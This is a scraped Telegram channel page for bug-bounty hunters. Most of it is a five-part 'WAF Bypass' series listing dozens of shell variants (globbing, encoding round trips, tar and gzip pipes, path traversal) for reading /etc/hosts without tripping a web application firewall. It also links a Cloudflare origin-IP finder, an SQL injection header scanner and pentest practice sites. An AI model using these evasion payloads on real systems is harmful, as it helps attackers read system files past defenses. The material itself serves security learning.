Bug Bounty - GitBook
Відкрити в Telegram
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
Показати більше7 451
Підписники
+1524 години
+227 днів
+18630 день
Архів дописів
7 451
⚡Bypass Series for bug hunters😎
Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tar cf - /etc/hosts | tar xf - -O
gzip -c /etc/hosts | gzip -d
less /e*c/h*st*
more /e{t,c}*/{o,h}*s*{s,t}
strings /??c/??sts
sort /etc/hosts | uniq
@GitBook_s
7 451
⚡Bypass Series for bug hunters😎
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
rev /etc/hosts | rev
od -An -c /etc/hosts | tr -d ' '
cat $HOME/../../etc/hosts
cat ${PWD}/../../../etc/hosts
grep "" /etc/hosts
cut -c1- /etc/hosts
paste /etc/hosts
@GitBook_s
7 451
⚡Bypass Series for bug hunters😎
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
cat < /etc/hosts
cat /proc/self/fd/0 < /etc/hosts
cat /etc/hosts | base64 | base64 -d
cat /etc/hosts | string collect
cat /etc/hosts | while read line; echo $line; end
echo (cat /etc/hosts)
@GitBook_s
7 451
⚡Bypass Series for bug hunters😎
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
xxd -p /etc/hosts | xxd -p -r
xargs -d '\n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null
@GitBook_s
7 451
WAF Bypass Series for bug hunters😎
Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tac /etc/hosts - 🧙♂️
man /etc/hosts - 😎
nl /etc/hosts - 🤯
less /etc/hosts - 🤫
more /etc/hosts - 😌
strings /etc/hosts - 😁
tail /etc/hosts - 😅
head /etc/hosts -🥱
@GitBook_s
7 451
نکته طلایی واقعا خیلی مهمه خیلی از افراد دیدم این اشتباه رو میکنن اصلا کار خوبی نیست .
7 451
Repost from Code Review
اگر میخواین به Bug Bounty به عنوان یک کار تمام وقت نگاه کنین ، حتما این راهنمای فوقالعادهی Rhynorater رو بخونین.
دوتا نسخه اینجا هست که یکیش انگلیسی و اصلی هست و برای سادگی کار یه نسخه فارسی هم ترجمه کردم.
7 451
⚠️CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applications.
https://github.com/musana/CF-Hero
7 451
Famous Platforms to practice Pentesting
✅ tryhackme
https://tryhackme.com
✅ bWAPP
http://itsecgames.com
✅ flAWS Cloud
http://flaws.cloud
✅ Hack Yourself First
http://hackyourselffirst.troyhunt.com
✅ OWASP Juice Shop
http://juice-shop.herokuapp.com
✅ Google Gruyere
https://google-gruyere.appspot.com
✅ Hack Me
https://hack.me
✅ HackTheBox
https://hackthebox.eu
✅ Root-Me
https://root-me.org
✅ XSS Game
https://xss-game.appspot.com
✅ Pentesterlab
https://pentesterlab.com
✅ OverTheWire
https://overthewire.org/wargames/
✅ Hacking Lab
https://hacking-lab.com/index.html
✅ IO
http://io.netgarage.org
✅ smashthestack
http://smashthestack.org
✅ microcorruption
https://microcorruption.com/login
✅ ExploitMe Mobile
http://securitycompass.github.io/AndroidLabs/index.html
✅ Hax.Tor
http://hax.tor.hu/welcome/
✅ Java Vulnerable Lab
https://github.com/CSPF-Founder/JavaVulnerableLab
✅ Pwnos
http://pwnos.com
✅ Ringzero
https://ringzer0team.com/challenges
✅ Avatao
https://avatao.com
✅ GameOver
https://sourceforge.net/projects/null-gameover/
✅ HSCTF3
http://hsctf.com
7 451
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.
https://github.com/ifconfig-me/SQLi-Scanner
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
